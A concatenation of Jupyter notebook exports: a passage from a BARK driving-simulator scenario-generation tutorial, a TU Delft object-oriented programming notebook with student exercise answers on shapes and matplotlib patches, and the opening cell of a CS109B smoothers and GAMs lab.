print(json.dumps(params.ConvertToDict(), indent=4))
###Output
Changing to bark root /home/julo/.cache/bazel/_bazel_julo/bcfa68c1d349bf355e13000545508072/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project
<bark.runtime.commons.parameters.ParameterServer object at 0x7f70a4e9f9b0>
bark/runtime/tests/data/city_highway_straight.xodr
Writing parameters to /home/julo/.cache/bazel/_bazel_julo/bcfa68c1d349bf355e13000545508072/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project/default_params.json
------ Scenario Default Parameters ---------
{
"Scenario": {
"Generation": {
"ConfigurableScenarioGeneration": {
"MapFilename": "bark/runtime/tests/data/city_highway_straight.xodr",
"SinksSources": [
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
0
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 60.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4,
"BrakeForLaneEnd": false,
"BrakeForLaneEndEnabledDistance": 60.0,
"BrakeForLaneEndDistanceOffset": 15.0,
"NumTrajectoryTimePoints": 11,
"CoolnessFactor": 0.0
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"EnforceControlledGoal": true,
"GoalTypeOthers": "EndOfLane",
"EnforceOthersGoal": true,
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "NoneControlled"
},
"AgentParams": {
"MaxHistoryLength": 50
}
},
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
1
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 30.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4,
"BrakeForLaneEnd": false,
"BrakeForLaneEndEnabledDistance": 60.0,
"BrakeForLaneEndDistanceOffset": 15.0,
"NumTrajectoryTimePoints": 11,
"CoolnessFactor": 0.0
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"EnforceControlledGoal": true,
"GoalTypeOthers": "EndOfLane",
"EnforceOthersGoal": true,
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "RandomSingleAgent"
},
"AgentParams": {
"MaxHistoryLength": 50
}
}
],
"ConflictResolution": {
"left_lane/right_lane": [
0.2,
0.8
]
}
}
}
}
}
###Markdown
In the default configuration, we have two source sink configs specified: one for the left lane of the road corridor on a highway, one for the right lane. We use the config reader type UniformVehicleDistribution for ConfigAgentStatesGeometries. There, we can specify vehicle distance ranges and ranges of initial velocity. As behavior model config, we use FixedBehaviorType, where one type of behavior model with its parameters is specified. The goal definition uses the config reader FixedGoalTypes, enabling separate specification of goal definitions for controlled and non-controlled agents. It uses a FrenetGoalType with a geometric goal region around the centerline of the goal lane. The extent of this region is specified via the parameter LongitudinalRange. With BARK's runtime, we can have a look at the scenarios created with the default parameter config:
###Code
%matplotlib qt
from bark.runtime.viewer.matplotlib_viewer import MPViewer
from bark.runtime.runtime import Runtime
import matplotlib.pyplot as plt
import time
params["Visualization"]["Agents"]["DrawAgentId"] = False
plt.figure(figsize=(5, 5))
viewer = MPViewer(
params=params,
y_length = 160,
enforce_y_length=True,
enforce_x_length=False,
follow_agent_id=False,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 10
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
world.Step(step_time)
time.sleep(step_time/4)
viewer.clear()
plt.close()
###Output
_____no_output_____
###Markdown
We see the controlled agent in red and its goal region on the right lane. We now tune the parameters such that the controlled agent's goal is on the left lane. Additionally, we want to create denser traffic on the left lane to make the lane change scenario harder. We decrease the ranges for sampling distances and velocities and recreate the scenarios:
###Code
params_src_sink_right = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]
params_src_sink_right["ConfigGoalDefinitions"]["GoalTypeControlled"] = "LaneChangeLeft"
params_src_sink_left = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][0]
params_src_sink_left["ConfigAgentStatesGeometries"]["VehicleDistanceRange"] = [5, 10]
params_src_sink_left["ConfigAgentStatesGeometries"]["OtherVehicleVelocityRange"] = [1, 2]
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
num_scenarios_to_show = 10
num_steps_per_scenario = 4
step_time = 0.2
plt.figure(figsize=(5, 5))
viewer = MPViewer(
params=params,
y_length = 160,
enforce_y_length=True,
enforce_x_length=False,
follow_agent_id=False,
axis=plt.gca())
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
world.Step(step_time)
time.sleep(step_time)
viewer.clear()
plt.close()
###Output
<bark.runtime.commons.parameters.ParameterServer object at 0x7f70a4e9f9b0>
bark/runtime/tests/data/city_highway_straight.xodr
###Markdown
3.5 Writing your own config reader to sample behavior types There are a number of config readers defined in [config_readers](https://github.com/bark-simulator/bark/tree/master/bark/runtime/scenario/scenario_generation/config_readers) and we plan to extend this set further in the future. In this section, we demonstrate how to write your own config reader by writing a config reader for behavior model sampling; the process can easily be applied to the other config reader types as well. The config reader shall randomly sample behavior types from a list of specified behavior types. We implement the interface of ConfigReaderBehaviorModels as follows
###Code
from bark.runtime.scenario.scenario_generation.config_readers.config_readers_interfaces import ConfigReaderBehaviorModels
from bark.core.models.behavior import *
from bark.runtime.commons.parameters import ParameterServer
class SampleBehaviorType(ConfigReaderBehaviorModels):
def __init__(self, random_state):
super().__init__(random_state)
self.param_servers = []
def create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs):
model_types = config_param_object["ModelTypesList", "Type of behavior model" \
"used for all vehicles", ["BehaviorIDMClassic", "BehaviorMobil"]]
model_params = config_param_object.AddChild("ModelParams")
# ----- DEFAULT PARAMETER HANDLING
# based on types retrieve default params which are maintained as scenario defaults
for model_type in model_types:
behavior_params = model_params.AddChild(model_type)
_, _ = self.model_from_model_type(model_type, behavior_params)
#param server must be persisted for each behavior to enable serialization of parameters
#------ BEHAVIOR MODEL SAMPLING
behavior_models = []
behavior_model_types = []
for _ in agent_states:
model_idx = self.random_state.randint(low=0, high=len(model_types), size=None)
model_type = model_types[model_idx]
model_type_params = model_params.AddChild(model_type)
params = ParameterServer()
bark_model, params = self.model_from_model_type(model_type, model_type_params)
self.param_servers.append(model_type_params)
behavior_models.append(bark_model)
behavior_model_types.append(model_type)
return behavior_models, {"behavior_model_types" : behavior_model_types}, config_param_object
def model_from_model_type(self, model_type, params):
bark_model = eval("{}(params)".format(model_type))
return bark_model, params
def get_param_servers(self):
return self.param_servers
###Output
_____no_output_____
###Markdown
The main functionality is covered in `create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs)`. Here, we first read a list of behavior types from the parameter server (a parameter is accessed with its name, a description and a default value, which is used if the parameter has not been set yet) and retrieve the default parameters of these model types. Then, we use the global random seed state managed by the scenario generation to sample the behavior types. Note that the parameter servers of the created objects must be persisted to allow for serialization of the behavior models. This class definition must be findable by ConfigurableScenarioGeneration. We put it into [behavior_model_config_readers.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/behavior_model_config_readers.py), which contains the already existing ConfigReaderBehaviorModels. Now, we use this config to randomly sample Mobil and IDM models on the right highway lane. We first set the type of ConfigBehaviorModels to our new definition. By rerunning the scenario generation, all **default parameters are automatically extracted**. Afterwards, we can fine-tune these parameters. First, let's specify the new config type and extract the defaults. To specify a config type, simply use the name given to the config reader class. We now have the following initial source sink config, and running the scenario generation gives us the default params. These can of course be customized as desired.
###Code
sink_source_dict = [{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [0]},
"ConfigBehaviorModels": {"Type": "FixedBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "NoneControlled"},
"AgentParams" : {}
},
{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [1]},
"ConfigBehaviorModels": {"Type": "SampleBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "RandomSingleAgent"},
"AgentParams" : {}
}]
params = ParameterServer()
params["World"]["remove_agents_out_of_map"] = True
params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"] = sink_source_dict
scenario_generation = ConfigurableScenarioGeneration(num_scenarios=10,params=params)
print("\n\n ------ ConfigBehaviorModels Default Parameters ---------")
print(json.dumps(params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"] \
[1]["ConfigBehaviorModels"].ConvertToDict(), indent=4))
params["Visualization"]["Agents"]["DrawAgentId"] = False
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 1600,
enforce_y_length=True,
enforce_x_length=False,
use_world_bounds=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 20
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
world.Step(step_time)
viewer.clear()
plt.close()
###Output
_____no_output_____ |
Computerprogrameren TUDelft/Notebook 09 Object oriented programming/Halem_4597591_nb_notebook9.ipynb | ###Markdown
Exploratory Computing with Python *Developed by Mark Bakker* Notebook 9: Object oriented programming In this Notebook, we learn what Object Oriented Programming (OOP) is, what Classes are and how to write our own, and we learn how to make graphs using OOP and the `matplotlib` package.
###Code
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
###Output
_____no_output_____
###Markdown
A Triangle Class So far, we have learned what is called *functional* programming. In functional programming you write or use functions that manipulate data. For example, consider the case where we have to deal with a number of triangles. For each triangle we want to be able to compute its area, and we want to be able to plot it and fill the inside with a color. Say we have an arbitrary number of $N$ triangles. For each triangle we need to store the $(x,y)$ values of its three corner points. So we create arrays for the $x$ values of the corner points and arrays for the $y$ values of the corner points. Then we write a function that computes the area of a triangle given its three corners, we write a function that plots a triangle given its three corner points and a color to fill it, and finally we loop through all the triangles. This all sounds like a bit of work, but it is tractable. It already gets more complicated when we want to change a corner point of one triangle: we have to know its place in the array and change the correct corner point. It gets even more complicated when we have to deal with both triangles and rectangles. Triangles have three corner points, while rectangles have four corner points. The function to compute the area of a rectangle is very different, hence we have to make sure we call the area function for a triangle when we have a triangle, and the area function for a rectangle when we have a rectangle. The plotting is not much different, but we have to supply it four corner points rather than three. This gets a bit messier already. Wouldn't it be nice if it were possible to organize the data and functions in such a way that the data itself knows how to compute its area or how to plot itself? That may sound magical, but that is exactly what Object Oriented Programming does. Object oriented programming is, in essence, just another way of organizing your data and functions. Rather than defining and storing them separately, the data and functions are stored and bound together in what is called a *Class*. The data that are stored are called *attributes*, and the functions are called *methods*. This is probably easiest understood by writing a class and using it. Consider, for example, the class `Triangle` that stores the coordinates of the three corner points. Don't worry about the syntax yet (we will get back to that). Run the code below so we can start using the class.
###Code
class Triangle:
def __init__(self, x0y0, x1y1, x2y2):
self.x0y0 = x0y0
self.x1y1 = x1y1
self.x2y2 = x2y2
###Output
_____no_output_____
###Markdown
Now that the `Triangle` class is defined, we can start creating triangles. We can call the `Triangle` class just like a function and we need to provide it tuples of the three corner points. The `Triangle` class returns what is called an object. An object is an instance of a class. Note also that when you type `Triangle(` and hit [shift][tab], a small box pops up showing what input arguments are expected (you don't need to provide the `self` argument; more on that later). Let's create a triangle with corners (0,1), (3,0) and (2,3).
###Code
t1 = Triangle((0,1), (3,0), (2,3))
###Output
_____no_output_____
###Markdown
`t1` is now an instance of the class `Triangle`. We simply say that `t1` is a triangle. We have stored the three corner points of the triangle. Hence, each `Triangle` object has three attributes. You can find out what attributes an object has by typing `t1.` (don't forget the dot) and then hitting the [TAB] key. The attributes can be accessed with the *dot syntax*.
###Code
print(t1) # not very useful
print(t1.x0y0) # first corner point
print(t1.x1y1) # second corner point
print(t1.x2y2) # third corner point
###Output
<__main__.Triangle object at 0x000002BAB7668E10>
(0, 1)
(3, 0)
(2, 3)
###Markdown
Let's get back to the `Triangle` class. When we call the `Triangle` class (official lingo: we create a `Triangle` object, or more officially yet: we create an instance of the `Triangle` class), Python calls the `__init__` function. This function is called the *constructor*. It constructs an object. In the constructor you define what arguments need to be provided to create a triangle. The name `__init__` (that is *two* underscores before and after the word `init`) is required (it is one of the few unfortunate name choices of the Python language). The first argument is `self` and tells Python what the object itself is called inside the class. We saw above that typing `print(t1)` returns a meaningless message. This can be resolved by including a representation function, which needs to be called `__repr__`. This function is called when the object is printed (or converted to a string).
###Code
class Triangle:
def __init__(self, x0y0, x1y1, x2y2):
self.x0y0 = x0y0
self.x1y1 = x1y1
self.x2y2 = x2y2
def __repr__(self):
return 'Triangle with corners:' + str(self.x0y0) + str(self.x1y1) + str(self.x2y2)
t1 = Triangle((0,1), (3,0), (2,3))
print(t1)
###Output
Triangle with corners:(0, 1)(3, 0)(2, 3)
###Markdown
In the Triangle class, the three corner points are stored as three tuples. Hence, the $x$ value of the first corner point is `self.x0y0[0]` and the $y$ value is `self.x0y0[1]`. It may be useful to store one array of the three $x$ values of the three corner points and one array of the three $y$ values of the corner points. If those are stored, it is fairly easy to compute the area $A$ of a triangle using the following formula: $A = \frac{1}{2}|(x_0-x_2)(y_1-y_0) - (x_0-x_1)(y_2-y_0)|$. Let's modify the `Triangle` class to include these two additional attributes and an `area` function
###Code
class Triangle:
def __init__(self, x0y0, x1y1, x2y2):
self.x0y0 = x0y0
self.x1y1 = x1y1
self.x2y2 = x2y2
self.x = np.array([self.x0y0[0], self.x1y1[0], self.x2y2[0]])
self.y = np.array([self.x0y0[1], self.x1y1[1], self.x2y2[1]])
def __repr__(self):
return 'Triangle with corners:' + str(self.x0y0) + str(self.x1y1) + str(self.x2y2)
def area(self):
A = 0.5 * np.abs((self.x[0] - self.x[2]) * (self.y[1] - self.y[0]) -
(self.x[0] - self.x[1]) * (self.y[2] - self.y[0]))
return A
###Output
_____no_output_____
###Markdown
Note that the `area` function gets passed the object `self`; once it knows what `self` is, it has access to all its attributes and functions. We can now create a `Triangle` object and compute its area as follows (don't forget to run the new `Triangle` class above first)
###Code
t1 = Triangle( (0,1), (3,0), (2,3) )
print(t1.area())
###Output
4.0
###Markdown
In the code above, the `area` function is called using the *dot* syntax, where `self` in the function is automatically replaced with the variable before the dot (in this case `t1`). The *dot* syntax is short for the much longer
###Code
print(Triangle.area(t1))
###Output
4.0
###Markdown
Note that classes are very convenient, as the triangle object knows what its own corner points are. When typing `t1.`[TAB], not only all attributes but also all functions of an object are shown. Try it:
###Code
# type t1. and then a tab
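# (a scriptable alternative to tab-completion: dir(t1) lists the same attributes and methods)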
###Output
_____no_output_____
###Markdown
Let's expand the `Triangle` class by adding a function that plots a filled triangle. The color of the triangle is supplied with a keyword argument in the constructor. Hence, when it is not provided, the default value will be used.
###Code
class Triangle:
def __init__(self, x0y0, x1y1, x2y2, color='b'):
self.x0y0 = x0y0
self.x1y1 = x1y1
self.x2y2 = x2y2
self.x = np.array([self.x0y0[0], self.x1y1[0], self.x2y2[0]])
self.y = np.array([self.x0y0[1], self.x1y1[1], self.x2y2[1]])
self.color = color
def __repr__(self):
return 'Triangle with corners:' + str(self.x0y0) + str(self.x1y1) + str(self.x2y2)
def area(self):
A = 0.5 * np.abs((self.x[0]-self.x[2])*(self.y[1]-self.y[0]) -
(self.x[0]-self.x[1])*(self.y[2]-self.y[0]))
return A
def plot(self):
plt.fill(self.x, self.y, color=self.color)
###Output
_____no_output_____
###Markdown
Let's create three triangles and store them in a list. Then we loop through the triangles in the list and plot them in one graph. Note how we can loop through the triangles in the list `tlist`: `for t in tlist:`. So every time we go through the loop, `t` is the next triangle in the list `tlist`.
###Code
tlist = [] # start with an empty list
t1 = Triangle((0,1), (5,0), (3,3), 'b')
tlist.append(t1) # add t1 to the list
t2 = Triangle((3,4), (1,6), (-2,3), 'r')
tlist.append(t2)
t3 = Triangle((8,-1), (6,4), (2,6), 'g')
tlist.append(t3)
plt.figure()
for t in tlist:
t.plot()
plt.axis('scaled');
###Output
_____no_output_____
###Markdown
Similarly, the total area of the three triangles is
###Code
areatot = 0.0
for t in tlist:
areatot += t.area()
print('total area:', areatot)
###Output
total area: 20.5
###Markdown
Exercise 1. A Rectangle class Create a `Rectangle` class for rectangles that stand straight up, so that the base is horizontal. Input arguments are the $(x,y)$ values of the lower-left-hand corner, the width of the base and the height. Class functions are: `area`, which returns the area of the rectangle, and `plot`, which plots a filled rectangle using a transparency of 0.5 (i.e., use keyword argument `alpha=0.5` in the `fill` function). Fill the rectangle with the color blue when the width of the rectangle is larger than the height, and fill it with the color red when the width is smaller than the height. Demonstrate that your `Rectangle` class works by plotting two rectangles, one with lower-left-hand corner (0, 0), width 10 and height 5, and the other with lower-left-hand corner (2, 0), width 4 and height 8.
###Code
class Rectangle:
def __init__(self, x1, y1, base, height):
self.x1 = x1
self.y1 = y1
self.base = base
self.height = height
self.x = np.array([self.x1, (self.x1 + self.base), (self.x1 + self.base), self.x1])
self.y = np.array([self.y1, self.y1, (self.y1 + self.height), (self.y1 + self.height)])
def plot(self):
if (self.base/self.height) < 1:
color = 'r'
else:
color = 'b'
plt.fill(self.x, self.y, alpha = 0.5, color = color)
def area(self):
A = self.base * self.height
return A
r1 = Rectangle(0, 0, 10, 5)
r2 = Rectangle(2, 0, 4, 8)
print(r1.area())
print(r2.area())
r1.plot()
r2.plot()
###Output
50
32
###Markdown
Exercise 2. Many rectangles Demonstrate that your `Rectangle` class works by loading the text file `rectangle_data.txt`. This file contains the $x$, $y$, width, and height for 20 rectangles. Compute and report the total area of all the rectangles in the file. Make a plot of the 20 rectangles to demonstrate that the colors are assigned correctly.
###Code
r = np.genfromtxt('rectangle_data.txt', delimiter=' ' )
rlist = []
for j in range(len(r[:,0])):
t = Rectangle(r[j,0], r[j,1], r[j,2], r[j,3])
t.plot()
plt.axis('scaled');
###Output
_____no_output_____
###Markdown
Arrays are objects Now that you have learned about OOP, you may realize that many of the Python features you use are actually based on OOP. For example, when you create an array, the array is an object.
###Code
x = np.arange(12)
print('type of x:', type(x))
###Output
type of x: <class 'numpy.ndarray'>
###Markdown
Hence, an array has attributes and class methods associated with it. You can type `dir(x)` to find out all attributes and methods (there are many). Some of the attributes of an array include the number of dimensions and the shape. You can even change the shape (as long as you make sure the shape fits the array) by modifying the shape attribute.
###Code
print('number of dimensions of x:', x.ndim)
print('shape of x:', x.shape)
x.shape = (4, 3)
print('new shape of x:', x.shape)
print(x)
###Output
number of dimensions of x: 1
shape of x: (12,)
new shape of x: (4, 3)
[[ 0 1 2]
[ 3 4 5]
[ 6 7 8]
[ 9 10 11]]
###Markdown
An array also has a number of functions, including a function that returns the mean value of the array or the maximum value of an array.
###Code
print('mean of x: ', x.mean())
print('max of x: ', x.max())
###Output
mean of x: 5.5
max of x: 11
###Markdown
Plotting features are objects All plotting commands we have used so far are functions that are part of the `matplotlib` package. Not surprisingly, `matplotlib` has an object-oriented design. Plots may be created by making use of the object-oriented structure. This requires a bit of additional typing, but in the end we gain additional flexibility and the ability to make animations. Using the OO syntax, we first create a `figure` object and specify the size using the `figsize` keyword argument (the size of the figure is specified in inches), then we add an axis to the figure with the `add_axes` command (note that it is `axes` with an `e`) by specifying the *relative* location of the axis in the figure. The left, bottom, width, and height are specified in relative coordinates (both the horizontal and vertical direction run from 0 to 1). To plot, we use the `plot` method of the axis.
###Code
x = np.linspace(0, 2, 100)
y = x ** 2
fig = plt.figure(figsize=(10, 5))
ax1 = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax1.plot(x, y, 'b')
ax1.set_xlabel('x')
ax1.set_ylabel('y')
ax1.set_title('Example figure');
###Output
_____no_output_____
###Markdown
We can add as many axes to the figure as we want and decide exactly where each axis is located.
###Code
ax2 = fig.add_axes([0.15,0.5,0.4,0.3])
ax2.plot(x,-y,'r')
ax2.set_title('Second axis');
###Output
_____no_output_____
###Markdown
Matplotlib patches The plotting package `matplotlib` includes a set of classes to define shapes, which are called *patches* in `matplotlib`. There are patches for many different shapes including circles, ellipses, polygons, wedges, and arrows. Here we learn how to draw these patches. We learn how to make them move interactively in a future notebook. The process for adding a patch to a graph is always the same. First you create an axis, then you create a patch object and you add the patch object to the axis. Each patch object has a few input arguments and a number of keyword arguments. The keyword arguments include: `ec` for edge color, `fc` for face color, `alpha` for transparency, and `zorder` for the order in which they are plotted (the patch with the highest `zorder` value lies on top). The names of all patch classes start with a capital: `Circle`, `Ellipse`, `Polygon`, `Wedge`, `Arrow`. You need to import these classes from `matplotlib.patches` to be able to use them. Use the help system to learn about the required input arguments. The graph below contains two circles, where the smaller one is on top of the larger one. The background color of the graph is set to the same color as the small circle (using the `fc` (facecolor) keyword of the `add_axes` function), so that it looks like the large circle has a hole. The aspect ratio of the axis is set to `'equal'` when the axis is created. The `autoscale` function needs to be called to set the limits of the axis such that the patches fit exactly in the axis. Alternatively, you can call the `ax.set_xlim` and `ax.set_ylim` functions to select limits of your own choice.
###Code
from matplotlib.patches import Circle
fig = plt.figure()
ax = fig.add_axes([.1, .1, .8, .8], fc='violet', aspect='equal')
small = Circle(xy=(3, 5), radius=1, fc='violet', ec='violet', zorder=2)
big = Circle(xy=(2, 4), radius=3, fc='dodgerblue', ec='dodgerblue', zorder=1)
print(big)
ax.add_patch(small)
ax.add_patch(big)
ax.autoscale()
###Output
_____no_output_____
###Markdown
Exercise 3. `Circle` patch Create a plot with 20 circles with radius 0.2 using `Circle` patches, with their centers equally spaced (in $x$) along the line $y=\sin(x)$ for $x$ going from 0 to $2\pi$.
###Code
from matplotlib.patches import Circle
x = np.linspace(0, 2 * np.pi, 20)
y = np.sin(x)
r = 0.2
fig = plt.figure()
ax = fig.add_axes([.1, .1, .8, .8], aspect='equal')
for i in range(len(x)):
c = Circle(xy=(x[i], y[i]), radius = r)
ax.add_patch(c)
ax.autoscale()
###Output
_____no_output_____
###Markdown
Exercise 4. `Arrow` patch Create 20 arrows with width 0.2 using `Arrow` patches. The starting points of the arrows are equally spaced (in $x$) along the line $y=\sin(x)$ for $x$ going from 0 to $2\pi$. Each arrow is 0.2 long in the $x$ direction (`dx=0.2`) and the length and sign in the $y$ direction (`dy`) need to be chosen such that the arrow is tangent to the line $y=\sin(x)$ at its starting point. (Hint: use the derivative of the line.)
###Code
from matplotlib.patches import Arrow
x = np.linspace(0, 2 * np.pi, 20)
y = np.sin(x)
r = 0.2
fig = plt.figure()
ax = fig.add_axes([.1, .1, .8, .8], aspect='equal')
for i in range(len(x)):
c = Arrow(x[i], y[i], 0.2, np.cos(x[i])*0.2, width = 0.2 )
ax.add_patch(c)
ax.autoscale()
###Output
_____no_output_____
###Markdown
Exercise 5. Packing circles in a square Consider trying to put as many non-overlapping circles as possible in a square area. All circles have the same radius. The highest packing density (relative area covered by the circles) is obtained by putting the circles in stacked rows as shown in the figure below, which has a packing density of 0.9069. For more information on circle packing, including circles with different radii, see [here](http://en.wikipedia.org/wiki/Circle_packing). We are going to put circles in a square area by generating locations randomly. Put as many circles with radius 0.05 as you can in a square with sides equal to 1 (lower left-hand corner $(x,y)=(0,0)$, upper right-hand corner $(x,y)=(1,1)$) by randomly generating the centers of the circles with the `np.random.rand` function. First, write a function called `overlap` that takes as input arguments two `Circle` patches and returns `True` when the circles overlap and `False` when they don't. Each `Circle` patch stores its center and radius as the attributes `center` and `radius`. Test your code with the following three circles: `c1 = Circle(xy=(0, 0), radius=5)`, `c2 = Circle(xy=(5, 0), radius=2)`, `c3 = Circle(xy=(2, 5), radius=1)`; then `print('overlap(c1, c2):', overlap(c1, c2))` should report `True` (they overlap), `print('overlap(c2, c3):', overlap(c2, c3))` should report `False` (they don't overlap), and `print('overlap(c1, c3):', overlap(c1, c3))` should report `True` (they overlap).
###Code
def overlap(c1, c2):
A = None
r1 = c1.radius
r2 = c2.radius
x1 = c1.center[0]
x2 = c2.center[0]
y1 = c1.center[1]
y2 = c2.center[1]
if np.sqrt((x2-x1)**2 + (y2-y1)**2 ) < r1 + r2:
A = True
else:
A = False
return A
c1 = Circle(xy=(0, 0), radius=5)
c2 = Circle(xy=(5, 0), radius=2)
c3 = Circle(xy=(2, 5), radius=1)
print ('overlap(c1, c2):', overlap(c1, c2)) # overlaps
print ('overlap(c2, c3):', overlap(c2, c3)) # doesn't overlap
print ('overlap(c1, c3):', overlap(c1, c3)) # overlaps
###Output
overlap(c1, c2): True
overlap(c2, c3): False
overlap(c1, c3): True
###Markdown
Exercise 6. Create a list to store all circles that fit inside the unit square. Generate random locations of the circles with the `np.random.rand` function, which returns random values between 0 and 1. All circles have radius 0.05. Check whether a generated circle fits entirely inside the unit square. If it fits inside the square, use the `overlap` function that you wrote in the previous exercise to determine whether it overlaps with any of the circles in the list. If it doesn't overlap with any of the other circles, then add it to the list. Stop when you have generated 50 circles (it is very difficult to fit more non-overlapping circles inside the square with this procedure). Create a plot showing your 50 circles.
###Code
from matplotlib.patches import Circle
fig = plt.figure()
ax = fig.add_axes([.1, .1, .8, .8], aspect='equal')
clist = []
r = 0.05
clist.append(Circle(xy = (0.9 * np.random.rand(2,1) + 0.05), radius = r))
while len(clist) < 50:
g = False
z = Circle(xy = (0.9 * np.random.rand(2,1) + 0.05), radius = r)
for i in range(len(clist)):
if overlap(clist[i], z) == True:
g = True
break
if g == False:
clist.append(z)
ax.add_patch(z)
###Output
_____no_output_____ |
content/labs/lab2/.ipynb_checkpoints/cs109b_lab2_smooths_and_GAMs_more-checkpoint.ipynb | ###Markdown
CS109B Data Science 2: Advanced Topics in Data Science Lecture 5.5 - Smoothers and Generalized Additive Models - Model Fitting JUST A NOTEBOOK + SOME ADDITIONS (see New Material) **Harvard University** **Spring 2021** **Instructors:** Mark Glickman, Pavlos Protopapas, and Chris Tanner **Lab Instructor:** Eleni Kaxiras *Content:* Eleni Kaxiras and Will Claybaugh --- New material here: - [References](bsplines) - [info on B-spline basis functions](basis) - [Cleaner formula for csaps](csaps) Also cleaner Table of Contents
###Code
## RUN THIS CELL TO PROPERLY HIGHLIGHT THE EXERCISES
import requests
from IPython.core.display import HTML
styles = requests.get("https://raw.githubusercontent.com/Harvard-IACS/2019-CS109B/master/content/styles/cs109.css").text
HTML(styles)
import numpy as np
from scipy.interpolate import interp1d
import matplotlib.pyplot as plt
import pandas as pd
%matplotlib inline
###Output
_____no_output_____
###Markdown
